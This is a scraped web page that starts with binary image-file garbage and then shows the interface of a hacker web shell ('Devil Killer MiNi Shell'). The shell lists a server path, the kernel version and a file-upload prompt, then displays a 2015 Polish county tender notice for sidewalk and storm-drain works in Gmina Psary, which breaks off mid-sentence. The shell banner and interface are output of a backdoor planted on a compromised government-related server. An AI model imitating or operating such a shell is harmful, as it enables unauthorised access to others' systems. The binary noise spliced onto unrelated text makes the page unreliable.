JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150828/222656-N-2015.html

<p class="kh_header"><b>Rogoźnik: Przebudowa dróg powiatowych na terenie Gminy Psary</b><br>
<b>Numer ogłoszenia: 222656 - 2015; data zamieszczenia: 28.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku , ul. Węgroda 59, 42-582 Rogoźnik, woj. śląskie, tel. 032 2877519, 2877872, faks 032 2877885.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip-pzd.powiat.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg powiatowych na terenie Gminy Psary.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania: Przebudowa dróg powiatowych na terenie Gminy Psary (z podziałem na części). Zakres robót obejmuje:
Część I: Budowa chodnika przy drodze powiatowej 4719 S - ul. Malinowicka i 4784 S - ul. Wiejska w Psarach - etap I - budowa kanalizacji deszczowej i chodnika na odcinku od przystanku autobusowego na ul. Wiejskiej do przystanku autobusowego na ul. Malinowickiej. Zakres robót obejmuje:                                                                                                                                                          
a)	budowę kanału deszczowego fi 300 PVC o dł. 83,7 m                                                                                                                       
 b)	budowę kanału deszczowego fi 250 PVC o dł. 146,2 m                                                                                                                      
c)	zabudowę studni rewizyjnych fi 1200 szt. 11                                                                                                                                       
d)	zabudowę osadnika - szt. 1                                                                                                                                                                   
e)	zabudowę separatora lamelowego - szt. 1                                                                                                                                           
f)	budowę chodnika z kształtek betonowych - pow. 227,68 m2
g)	budowę zjazdów do posesji z kształtek betonowych - pow. 85,67 m2
h)	demontaż starej oraz montaż nowej wiaty przystankowej - szt. 1
Część II: Budowa chodnika przy drodze powiatowej 4713 S - ul. Belna w Strzyżowicach - etap III - budowa chodnika na odcinku od istniejącego zjazdu kostki betonowej przy posesji nr 13 do zjazdu przy posesji nr 27 na długości 100,6 mb (po stronie północnej ul. Belnej) oraz budowa kanalizacji deszczowej od S9 do S10 (włącznie). Zakres robót obejmuje:
a)	zabudowę krawężników betonowych wystających na ławie bet. na dł. 61,5 mb
b)	zabudowę krawężników betonowych najazdowych na lawie bet. na dł. 39,1 mb
c)	zabudowę obrzeży betonowych 30x8 cm na dł. 112,6 mb
d)	budowę konstrukcji i nawierzchni chodnika z kształtek betonowych gr. 8 cm na pow. 92,25 m2
e)	budowę konstrukcji i nawierzchni zjazdu do posesji z kształtek betonowych gr. 8 cm na pow. 58,65 m2
f)	plantowanie i humusowanie terenów w pasie drogowym na pow. 130,6 m2
g)	budowę kanalizacji deszczowej z rur PVC fi 400 o dł. 65,3 mb
h)	zabudowę studni rewizyjnych fi 1000 - szt. 1
i)	zabudowę studzienek ściekowych fi 500 - szt. 2
j)	budowę przykanalików fi 250 PVC dł. 9,9 mb
Część III: Budowa chodnika wraz w odwodnieniem w ciągu drogi powiatowej 4782 S w Brzękowicach Górnych, Goląszy Górnej i Dąbiu Górnym - etap II - budowa kanalizacji deszczowej odwadniającej pas drogowy fragmentu drogi powiatowej 4782 S w Brzękowicach Górnych o długości ok. 235 m. Zakres robót obejmuje:
a)	budowę kanału deszczowego fi 315 PVC o dł. 152,5 m
b)	budowę kanału deszczowego fi 160 PVC o dł. 27,4 m
c)	zabudowę studni rewizyjnych fi 1200 szt. 5
d)	zabudowę studzienek ściekowych - szt. 8
Część IV: Przebudowa drogi powiatowej 3204 S - budowa chodnika przy ul. Kościuszki w Górze Siewierskiej - etap II - przebudowa drogi powiatowej w Gminie Psary dla poprawy bezpieczeństwa ruchu pieszych oraz poprawę odwodnienia pasa drogowego z wód opadowych. Zakres robót obejmuje:
a)	budowę kanału deszczowego fi 315 PVC o dł. 59,5 m
b)	budowę kanału deszczowego fi 200 PVC o dł. 48,0 m
c)	budowę przykanalików fi 160 PVC o dł. 4,0 m
d)	zabudowę studni rewizyjnych fi 1000 - szt. 4
e)	zabudowę studzienek ściekowych fi 500 - szt. 3
f)	zabudowę separatora z zintegrowanym osadnikiem DN/ID 1200
g)	zabudowę krawężników betonowych na dł. 100,0 mb
h)	zabudowę obrzeży betonowych na dł. 108,5 mb
i)	wykonanie chodnika z kształtek betonowych na pow. 134,25 m2
j)	wykonanie zjazdów do posesji z kształtek betonowych na pow. 68,8 m2
Część V: Przebudowa drogi powiatowej 4787 S od km 0+000 do km 2+050 - przebudowa chodnika w ulicy Wiejskiej w Sarnowie - etap V - budowa kanalizacji deszczowej dla potrzeb odwodnienia pasa drogowego oraz budowa chodnika na ul. Wiejskiej.          Zakres robót obejmuje:
a)	budowę kanału deszczowego fi 500 PVC o dł. 163,95 m
b)	zabudowę studni rewizyjnych fi 1200 - szt. 4
c)	zabudowę studzienek ściekowych - szt. 4
d)	wykonanie nowego chodnika z kształtek betonowych na pow. 183,0 m2
e)	wykonanie nowych zjazdów do posesji z kształtek betonowych na pow. 40,0 m2
f)	zabudowę krawężnika betonowego na dł. 132,0 mb
g)	zabudowę obrzeży betonowych na dł. 154,0 mb
h)	odtworzenie konstrukcji i nawierzchni jezdni asfaltowej po robotach instalacyjnych na pow. 259,93 m2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 45.23.32.22-1, 45.23.31.61-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: Część I: Budowa chodnika przy drodze powiatowej 4719 S - ul. Malinowicka i 4784 S - ul. Wiejska w Psarach - etap I - 6 000,00 PLN (słownie: sześć tysięcy złotych 00/100) Część II: Budowa chodnika przy drodze powiatowej 4713 S - ul. Belna w Strzyżowicach - etap III - 3 000,00 PLN (słownie: trzy tysiące złotych 00/100) Część III: Budowa chodnika wraz w odwodnieniem w ciągu drogi powiatowej 4782 S w Brzękowicach Górnych, Goląszy Górnej i Dąbiu Górnym - etap II - 2 500,00 PLN (słownie: dwa tysiące pięćset złotych 00/100) Część IV: Przebudowa drogi powiatowej 3204 S - budowa chodnika przy ul. Kościuszki w Górze Siewierskiej - etap II - 3 000,00 PLN (słownie: trzy tysiące złotych 00/100) Część V: Przebudowa drogi powiatowej 4787 S od km 0+000 do km 2+050 - przebudowa chodnika w ulicy Wiejskiej w Sarnowie - etap V - 6 000,00 PLN (słownie: sześć tysięcy złotych 00/100) Wadium może być wniesione w: a)	pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)gwarancjach bankowych,d)gwarancjach ubezpieczeniowych,e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.). Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący numer konta: Bank Spółdzielczy w Będzinie 92 8438 0001 0020 0639 2000 0030: z dopiskiem: Wadium w przetargu na zadanie: Przebudowa dróg powiatowych na terenie Gminy Psary  (z podaniem numeru i nazwy części). Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert. Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszał integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony w koszulce, co pozwoli na swobodne oddzielenie wadium od reszty dokumentów). Zamawiający zwróci wniesione wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem punktu 2.7 lit. a niniejszego rozdziału SIWZ.  Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, zgodnie z zapisem punktu 2.2 niniejszego rozdziału SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez Zamawiającego.  Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.  Zamawiający zatrzyma wadium wraz z odsetkami:  a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy,  z przyczyn leżących po jego stronie, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,   b) jeżeli Wykonawca, którego oferta została wybrana:   - odmówi podpisania umowy na warunkach określonych w ofercie,   - nie wniesie zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia, - zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył co najmniej 3 roboty budowlane polegające na wykonaniu:
- w przypadku Części I: Budowa chodnika przy drodze powiatowej 4719 S - ul. Malinowicka i 4784 S - ul. Wiejska w Psarach - etap I - budowy, przebudowy lub remontu chodników i odwodnienia pasa drogowego, każda o wartości nie mniejszej niż 200 000,00 zł brutto;
- w przypadku Części II: Budowa chodnika przy drodze powiatowej 4713 S - ul. Belna w Strzyżowicach - etap III - budowy, przebudowy lub remontu chodników i odwodnienia pasa drogowego, każda o wartości nie mniejszej niż 100 000,00 zł brutto;
- w przypadku Części III: Budowa chodnika wraz w odwodnieniem w ciągu drogi powiatowej 4782 S w Brzękowicach Górnych, Goląszy Górnej i Dąbiu Górnym - etap I - budowy, przebudowy lub remontu odwodnienia pasa drogowego, każda o wartości nie mniejszej niż 100 000,00 zł brutto;
- w przypadku Części IV: Przebudowa drogi powiatowej 3204 S - budowa chodnika przy ul. Kościuszki w Górze Siewierskiej - etap II - budowy, przebudowy lub remontu chodników i odwodnienia pasa drogowego, każda o wartości nie mniejszej niż 100 000,00 zł brutto;
- w przypadku Części V: Przebudowa drogi powiatowej 4787 S od km 0+000 do km 2+050 - przebudowa chodnika w ulicy Wiejskiej w Sarnowie - etap V - budowy, przebudowy lub remontu chodników i odwodnienia pasa drogowego, każda o wartości nie mniejszej niż 200 000,00 zł brutto.
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a)	wykaz robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  z podaniem ich rodzaju i wartości, daty i miejsca wykonania - zgodnie z załącznikiem nr 4 do SIWZ,
b)	dowody dotyczące najważniejszych robót określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami, o których wyżej mowa, są: 
- poświadczenie,
- inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Wystarczające będzie wskazanie w wykazie oraz załączenie dowodów dotyczących robót budowlanych w liczbie i zakresie niezbędnym do wykazania spełniania wyżej opisanego warunku wiedzy i doświadczenia.
W przypadku, gdy Zamawiający - Powiatowy Zarząd dróg w Będzinie z/s w Rogoźniku jest podmiotem, na rzecz którego roboty budowlane wskazane w załączniku Nr 4 do SIWZ zostały wcześniej wykonane, Wykonawca nie  ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) odpowiednim potencjałem technicznym, tj. narzędziami, wyposażeniem zakładu i urządzeniami technicznymi w celu realizacji zamówienia - W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą oświadczenie o spełnianiu warunku, zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobą/ami zdolną/ymi do wykonania zamówienia, tj.: - co najmniej 1 osobą posiadającą/ymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie, tj. uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności drogowej, - co najmniej 1 osobą posiadającą/ymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacji deszczowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną/ymi we właściwym samorządzie zawodowym, zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budowlanych oraz urbanistów (Dz. U. z 2013 r. poz. 932) lub	spełniającą/ymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409) tj. osobą/y, której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą/ymi wymogi, o których mowa w art. 20a ustawy z dnia 15.12. 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych). W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą: a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej w punkcie 2.3.1) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnymi dla wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 5 do SIWZ,  b) oświadczenie, że osoba/y, która/e będzie/ą uczestniczyć w wykonywaniu zamówienia, posiada/ją wymagane uprawnienia - zgodnie z załącznikiem nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4 (opis sposobu dokonania oceny spełniania warunków) rozdziału XI SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolności finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii notarialnej lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający swoje zasoby.  Jeżeli Wykonawca, wykazując spełnianie warunków, opisanych w pkt 2.2 do 2.4 niniejszego rozdziału SIWZ, polega na zasobach innych podmiotów na zasadach określonych powyżej w punkcie 4 (zgodnie z art. 26 ust. 2b Ustawy), Zamawiający,  w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności: a)zakresu dostępnych Wykonawcy zasobów innego podmiotu, b)sposobów wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia, c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Zamawiający zażąda w/w dokumentów, jeżeli Wykonawca nie udowodni   w wystarczający sposób dysponowania zasobami innego podmiotu w oparciu o art. 26 ust. 2b ustawy. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b 